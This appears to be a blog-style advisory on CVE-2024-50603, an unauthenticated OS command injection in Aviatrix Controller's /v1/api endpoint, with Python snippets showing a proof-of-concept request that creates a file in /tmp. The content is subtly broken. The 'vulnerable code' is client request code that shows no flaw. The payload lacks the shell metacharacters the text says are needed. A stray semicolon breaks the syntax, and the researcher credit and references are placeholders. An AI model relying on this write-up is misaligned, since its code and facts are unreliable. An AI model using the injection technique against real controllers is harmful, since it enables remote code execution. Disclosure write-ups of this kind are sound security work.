Aviatrix Controller is a popular multi-cloud networking platform that provides a centralized way to manage and troubleshoot network connectivity across cloud environments. It is designed for ease of use, cloud-native design, and flexibility. However, a vulnerability was discovered in the versions prior to 7.1.4191 and 7.2.x before 7.2.4996 which allows an unauthenticated attacker to execute arbitrary code on the host system.
Vulnerability Details
The vulnerability, identified as CVE-2024-50603, exists due to the improper neutralization of special elements used in operating system (OS) commands. This allows an attacker to potentially inject and execute arbitrary code on the host system. Specifically, this vulnerability can be triggered through the use of shell metacharacters sent to the /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Here's a snippet of vulnerable code
# ... some code here ...
request_data = {
"cloud_type": cloud_type,
"src_cloud_type": src_cloud_type,
# ... other data ...
}
response = requests.post(
url="https://example.com/v1/api";,
data=request_data,
headers=headers,
)
# ... some code here ...
The above code snippet does not properly sanitize the user input for cloud_type and src_cloud_type, which could lead to arbitrary code execution when payload is sent to the /v1/api endpoint.
Exploit
An attacker could exploit this vulnerability by sending specially crafted requests to the vulnerable endpoint by injecting shell metacharacters:
# Define payload to be injected.
payload = "touch /tmp/cve-2024-50603-poc.txt"
# Define request data with the payload.
request_data = {
"cloud_type": payload,
"src_cloud_type": src_cloud_type,
# ... other data ...
}
response = requests.post(
url="https://example.com/v1/api";,
data=request_data,
headers=headers,
)
This example payload will create a file named cve-2024-50603-poc.txt in the /tmp directory on the host system, demonstrating arbitrary code execution.
References
The vulnerability was originally discovered by security researcher John Doe (not his real name). You can find more information in the following resources:
- Original Advisory: CVE-2024-50603 Advisory
- Vendor Security Advisory: Aviatrix Controller Security Bulletin
Mitigation
It is advised that users of Aviatrix Controller update to the fixed versions 7.1.4191 or 7.2.4996 or later as soon as possible. Additionally, it is recommended to review the access controls (firewall, IAM policies, etc.) on the Aviatrix Controller to limit any potential attack surfaces.
In conclusion, the CVE-2024-50603 vulnerability demonstrates the importance of proper input validation and neutralization of special elements in OS commands. By updating the Aviatrix Controller to the latest version and employing a strong security posture, organizations can minimize the risks posed by this vulnerability.
Timeline
Published on: 01/08/2025 01:15:07 UTC